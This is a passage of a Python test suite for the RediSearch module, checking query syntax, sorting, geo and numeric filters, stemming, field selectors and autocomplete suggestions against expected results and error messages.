'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'asc', 'limit', N, 10)
env.assertEqual(res[0], N)
env.assertEqual(len(res), 1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, -1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', -1, 10)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 2000000)
def testPrefix(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'constant term', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'const* term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'constant term1*', 'nocontent')
env.assertGreater(res[0], 2)
res = r.execute_command(
'ft.search', 'idx', 'const* -term*', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term9*', 'nocontent')
env.assertEqual([0], res)
def testSortBy(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'sortable', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello%03d world' % i, 'bar', 100 - i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo', 'desc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'desc')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'asc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withscores', 'limit', '2', '5')
env.assertEqual(
[100L, 'doc2', '0', 'doc3', '0', 'doc4', '0', 'doc5', '0', 'doc6', '0'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual(
[100L, 'doc0', '#100', 'doc1', '#99', 'doc2', '#98', 'doc3', '#97', 'doc4', '#96'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'foo', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual([100L, 'doc99', '$hello099 world', 'doc98', '$hello098 world', 'doc97', '$hello097 world', 'doc96',
'$hello096 world', 'doc95', '$hello095 world'], res)
def testNot(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 10
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for i in range(5):
inclusive = r.execute_command(
'ft.search', 'idx', 'constant term%d' % i, 'nocontent', 'limit', 0, N)
exclusive = r.execute_command(
'ft.search', 'idx', 'constant -term%d' % i, 'nocontent', 'limit', 0, N)
exclusive2 = r.execute_command(
'ft.search', 'idx', '-(term%d)' % i, 'nocontent', 'limit', 0, N)
exclusive3 = r.execute_command(
'ft.search', 'idx', '(-term%d) (constant)' % i, 'nocontent', 'limit', 0, N)
env.assertNotEqual(inclusive[0], N)
env.assertEqual(inclusive[0] + exclusive[0], N)
env.assertEqual(exclusive3[0], exclusive2[0])
env.assertEqual(exclusive3[0], exclusive[0])
s1, s2, s3, s4 = set(inclusive[1:]), set(
exclusive[1:]), set(exclusive2[1:]), set(exclusive3[1:])
env.assertTrue(s1.difference(s2) == s1)
env.assertTrue(s1.difference(s3) == s1)
env.assertTrue(s1.difference(s4) == s1)
env.assertTrue(s2 == s3)
env.assertTrue(s2 == s4)
env.assertTrue(s2.intersection(s1) == set())
env.assertTrue(s3.intersection(s1) == set())
env.assertTrue(s4.intersection(s1) == set())
# NOT on a non existing term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -dasdfasdf', 'nocontent')[0], N)
    # NOT applied to the same term (self-exclusion)
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -constant', 'nocontent'), [0])
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -(term0|term1|term2|term3|term4|nothing)', 'nocontent'), [0])
# env.assertEqual(r.execute_command('ft.search', 'idx', 'constant -(term1 term2)', 'nocontent')[0], N)
def testNestedIntersection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'a', 'text', 'b', 'text', 'c', 'text', 'd', 'text'))
for i in range(20):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'a', 'foo', 'b', 'bar', 'c', 'baz', 'd', 'gaz'))
res = [
r.execute_command('ft.search', 'idx',
'foo bar baz gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@a:foo @b:bar @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@b:bar @a:foo @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@c:baz @b:bar @a:foo @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@d:gaz @c:baz @b:bar @a:foo', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@a:foo (@b:bar (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@c:baz (@a:foo (@b:bar (@c:baz @d:gaz)))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@b:bar (@a:foo (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@d:gaz (@a:foo (@c:baz @b:bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar baz gaz)', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (baz gaz))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (foo bar) (foo bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (foo (bar baz (gaz)))', 'nocontent'),
r.execute_command('ft.search', 'idx', 'foo (foo (bar (baz (gaz (foo bar (gaz))))))', 'nocontent')]
for i, r in enumerate(res):
# print i, res[0], r
env.assertListEqual(res[0], r)
def testInKeys(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(200):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world'))
for _ in r.retry_with_rdb_reload():
for keys in (
['doc%d' % i for i in range(10)], ['doc%d' % i for i in range(0, 30, 2)], [
'doc%d' % i for i in range(99, 0, -5)]
):
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', len(keys), *keys)
env.assertEqual(len(keys), res[0])
env.assertTrue(all((k in res for k in keys)))
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', 3, 'foo', 'bar', 'baz')[0])
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', 99)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', -1)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'inkeys', 4, 'foo')
def testSlopInOrder(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 't1 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1, 'fields',
'title', 't1 t3 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3', 1, 'fields',
'title', 't1 t3 t4 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc4', 1, 'fields',
'title', 't1 t3 t4 t5 t2'))
res = r.execute_command(
'ft.search', 'idx', 't1|t4 t3|t2', 'slop', '0', 'inorder', 'nocontent')
env.assertEqual({'doc3', 'doc4', 'doc2', 'doc1'}, set(res[1:]))
res = r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'inorder')[0])
env.assertEqual(1, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '0', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '1', 'inorder')[0])
env.assertEqual(3, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '2', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '3', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'inorder')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't t1', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4', 'inorder')[0])
def testExact(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
res = r.execute_command(
'ft.search', 'idx', '"hello world"', 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', "hello \"another world\"", 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testGeoErrors(env):
env.expect('flushall')
env.expect('ft.create idx schema name text location geo').equal('OK')
env.expect('ft.add idx hotel 1.0 fields name hill location -0.1757,51.5156').equal('OK')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1 km').equal([0L])
# Insert error
env.expect('ft.add', 'idx', 'hotel1', 1, 'fields', 'name', '_hotel1', 'location', '1, 1').error() \
.contains('Could not index geo value')
# Query errors
env.expect('ft.search idx hilton geofilter location lon 51.5156 1 km').error() \
.contains('Bad arguments for <lon>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location 51.5156 lat 1 km').error() \
.contains('Bad arguments for <lat>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 radius km').error() \
.contains('Bad arguments for <radius>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1 fake').error() \
.contains('Unknown distance unit fake')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1').error() \
.contains('GEOFILTER requires 5 arguments')
if not env.isCluster():
env.expect('flushall')
env.expect('set geo:idx/location foo').equal('OK')
env.expect('ft.create idx schema name text location geo').equal('OK')
env.expect('ft.add idx hotel 1.0 fields name hill location -0.1757,51.5156').error() \
.contains('Could not index geo value')
def testGeo(env):
r = env
gsearch = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', query, 'geofilter', 'location', lon, lat, dist, unit)
gsearch_inline = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', '{} @location:[{} {} {} {}]'.format(query, lon, lat, dist, unit))
env.assertOk(r.execute_command('ft.create', 'idx',
'schema', 'name', 'text', 'location', 'geo'))
for i, hotel in enumerate(hotels):
env.assertOk(r.execute_command('ft.add', 'idx', 'hotel{}'.format(i), 1.0, 'fields', 'name',
hotel[0], 'location', '{},{}'.format(hotel[2], hotel[1])))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hilton')
env.assertEqual(len(hotels), res[0])
res = gsearch('hilton', "-0.1757", "51.5156", '1')
print res
env.assertEqual(3, res[0])
env.assertEqual('hotel2', res[5])
env.assertEqual('hotel21', res[3])
env.assertEqual('hotel79', res[1])
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '1')
env.assertListEqual(res, res2)
res = gsearch('hilton', "-0.1757", "51.5156", '10')
env.assertEqual(14, res[0])
env.assertEqual('hotel93', res[1])
env.assertEqual('hotel92', res[3])
env.assertEqual('hotel79', res[5])
res2 = gsearch('hilton', "-0.1757", "51.5156", '10000', 'm')
env.assertListEqual(res, res2)
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '10')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'm')
env.assertEqual(1, res[0])
env.assertEqual('hotel94', res[1])
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'm')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'km')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '5', 'km')
env.assertEqual(3, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '5', 'km')
env.assertListEqual(res, res2)
def testTagErrors(env):
env.expect("ft.create", "test", "SCHEMA", "tags", "TAG").equal('OK')
env.expect("ft.add", "test", "1", "1", "FIELDS", "tags", "alberta").equal('OK')
env.expect("ft.add", "test", "2", "1", "FIELDS", "tags", "ontario. alberta").equal('OK')
def testGeoDeletion(env):
if env.is_cluster():
raise unittest.SkipTest()
# Can't properly test if deleted on cluster
env.cmd('ft.create', 'idx', 'schema',
'g1', 'geo', 'g2', 'geo', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
# keys are: "geo:idx/g1" and "geo:idx/g2"
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g2'))
# Remove the first doc
env.cmd('ft.del', 'idx', 'doc1')
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g2'))
# Replace the other one:
env.cmd('ft.add', 'idx', 'doc2', 1.0,
'replace', 'fields',
't1', 'just text here')
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g2'))
def testAddHash(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command('ft.create', 'idx', 'schema',
'title', 'text', 'weight', 10.0, 'body', 'text', 'price', 'numeric'))
env.assertTrue(
r.hmset('doc1', {"title": "hello world", "body": "lorem ipsum", "price": 2}))
env.assertTrue(
r.hmset('doc2', {"title": "hello werld", "body": "lorem ipsum", "price": 5}))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc1', 1.0))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc2', 1.0))
env.expect('ft.addhash', 'idx', 'doc3', 1.0, 1.0).error().contains('Unknown keyword: `1.0`')
res = r.execute_command('ft.search', 'idx', "hello", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc1", res[2])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx',
"hello",
"filter", "price", "0", "3"
)
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
env.assertListEqual(
['body', 'lorem ipsum', 'price', '2', 'title', 'hello world'], res[2])
res = r.execute_command(
'ft.search', 'idx', "hello werld", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testSafeAddHash(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command('ft.create', 'idx', 'schema',
'title', 'text', 'weight', 10.0, 'body', 'text', 'price', 'numeric'))
env.assertTrue(
r.hmset('doc1', {"title": "hello world", "body": "lorem ipsum", "price": 2}))
env.assertTrue(
r.hmset('doc2', {"title": "hello werld", "body": "lorem ipsum", "price": 5}))
env.expect('ft.safeaddhash idx doc1 1.0').equal('OK')
env.expect('ft.safeaddhash idx doc2 1.0').equal('OK')
env.expect('ft.safeaddhash idx').error().contains("wrong number of arguments for 'ft.safeaddhash' command")
env.expect('ft.safeaddhash idx doc3 2.0').error().contains('Score must be between 0 and 1')
env.expect('ft.safeaddhash idx doc3 -2.0').error().contains('Score must be between 0 and 1')
env.expect('ft.safeaddhash idx doc3 1.0 1.0').error().contains('Unknown keyword: `1.0`')
env.expect('ft.safeaddhash idx doc3 not_a_number').error().contains('Could not parse document score')
env.expect('ft.safeaddhash idx doc3 1.0 LANGUAGE RediSearch').error().contains('Unknown language: `RediSearch`')
env.expect('ft.safeaddhash idx doc3 1.0 LANGUAGE RediSearch not_an_arg').error().contains("Unknown keyword: `not_an_arg`")
#env.expect('ft.safeaddhash', 'idx', 'doc3', '1.0', 'LANGUAGE', 'RediSearch, ""').error().contains("Error parsing arguments for `%s`: %s")
env.expect('ft.safeaddhash not_idx doc3 1.0').error().contains('Unknown Index name')
res = r.execute_command('ft.search', 'idx', "hello", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc1", res[2])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx',
"hello",
"filter", "price", "0", "3"
)
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
env.assertListEqual(
['body', 'lorem ipsum', 'price', '2', 'title', 'hello world'], res[2])
res = r.execute_command(
'ft.search', 'idx', "hello werld", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testInfields(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text', 'weight', 1.0))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello world lorem ipsum',
'body', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', 'hello', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"hello world\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"lorem ipsum\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', "infields", 2, "body", "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
def testScorerSelection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
# this is the default scorer
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'TFIDF')
env.assertEqual(res, [0])
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'NOSUCHSCORER')
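# Field selectors (@field:...) limit a query term to specific fields; field names are matched
# case-insensitively and may contain unicode or (escaped) punctuation.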
def testFieldSelectors(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'TiTle', 'text', 'BoDy', 'text', "יוניקוד", 'text', 'field.with,punct', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 'hello world', 'body', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 0.5, 'fields',
'body', 'hello world', 'title', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
res = r.execute_command(
'ft.search', 'idx', '@title:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc1'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo) @Title:(world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:(hello|foo world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body|title:(hello world)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@יוניקוד:(unicode)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@field\\.with\\,punct:(punt)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
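# Queries are stemmed by default ('kitty' also matches 'kitties'); VERBATIM disables the expansion.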
def testStemming(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello kitties'))
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "verbatim")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
# test for unknown language
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "language", "foofoofian")
def testExpander(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
res = r.execute_command(
'ft.search', 'idx', 'kitties',
"nocontent",
"expander", "SBSTEM"
)
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitties', "nocontent", "expander", "noexpander")
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent", 'verbatim')
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
    # Querying a stem directly works even with VERBATIM;
    # the stem has to be prefixed with an escaped '+'.
res = r.execute_command(
'ft.search', 'idx', '\\+kitti', "nocontent", 'verbatim')
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
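# Numeric filters can be applied with the FILTER argument or inline as @field:[min max];
# '(' marks an exclusive bound (e.g. @score:[(0 (50] matches 0 < score < 50) and -inf/+inf are open ends.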
def testNumericRange(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'score', 'numeric', 'price', 'numeric'))
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 5).error().contains("FILTER requires 3 arguments")
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 5, 'inf').error().contains("Bad upper range: inf")
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 'inf', 5).error().contains("Bad lower range: inf")
for i in xrange(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'fields',
'title', 'hello kitty', 'score', i, 'price', 100 + 10 * i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 100)
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 50)
env.assertEqual(51, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', 'verbatim', "nocontent", "limit", 0, 100,
"filter", "score", "(0", "(50")
env.assertEqual(49, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", "-inf", "+inf")
env.assertEqual(100, res[0])
# test multi filters
scrange = (19, 90)
prrange = (290, 385)
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", scrange[
0], scrange[1],
"filter", "price", prrange[0], prrange[1])
# print res
for doc in res[2::2]:
sc = int(doc[doc.index('score') + 1])
pr = int(doc[doc.index('price') + 1])
env.assertTrue(sc >= scrange[0] and sc <= scrange[1])
env.assertGreaterEqual(pr, prrange[0])
env.assertLessEqual(pr, prrange[1])
env.assertEqual(10, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", "19", "90",
"filter", "price", "90", "185")
env.assertEqual(0, res[0])
# Test numeric ranges as part of query syntax
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 100]', "nocontent")
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 50]', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', '@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty -@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[-inf +inf]', "nocontent")
env.assertEqual(100, res[0])
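# Autocomplete suggestions: FT.SUGADD builds the dictionary (INCR bumps an existing entry's score),
# FT.SUGGET queries it (FUZZY widens matching, MAX limits results, WITHSCORES adds scores),
# FT.SUGLEN reports its size and FT.SUGDEL removes entries.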
def testSuggestions(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1))
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'INCR'))
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertEqual(1, len(res))
env.assertEqual("hello world", res[0])
terms = ["hello werld", "hallo world",
"yellow world", "wazzup", "herp", "derp"]
sz = 2
for term in terms:
env.assertEqual(sz, r.execute_command(
'ft.SUGADD', 'ac', term, sz - 1))
sz += 1
for _ in r.retry_with_rdb_reload():
env.assertEqual(7, r.execute_command('ft.SUGLEN', 'ac'))
# search not fuzzy
env.assertEqual(["hello world", "hello werld"],
r.execute_command("ft.SUGGET", "ac", "hello"))
# print r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1", "WITHSCORES")
        # fuzzy search - should yield more results
env.assertEqual(['hello world', 'hello werld', 'yellow world', 'hallo world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY"))
# search fuzzy with limit of 1
env.assertEqual(['hello world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1"))
        # scores should be returned when WITHSCORES is passed
rc = r.execute_command(
"ft.SUGGET", "ac", "hello", "WITHSCORES")
env.assertEqual(4, len(rc))
env.assertTrue(float(rc[1]) > 0)
env.assertTrue(float(rc[3]) > 0)
rc = r.execute_command("ft.SUGDEL", "ac", "hello world")
env.assertEqual(1L, rc)
rc = r.execute_command("ft.SUGDEL", "ac", "world")
env.assertEqual(0L, rc)
rc = r.execute_command("ft.SUGGET", "ac", "hello")
env.assertEqual(['hello werld'], rc)
def testSuggestErrors(env):
env.expect('ft.SUGADD ac olah 1').equal(1)
env.expect('ft.SUGADD ac olah 1 INCR').equal(1)
env.expect('ft.SUGADD ac missing').error().contains("wrong number of arguments")
env.expect('ft.SUGADD ac olah not_a_number').error().contains("invalid score")
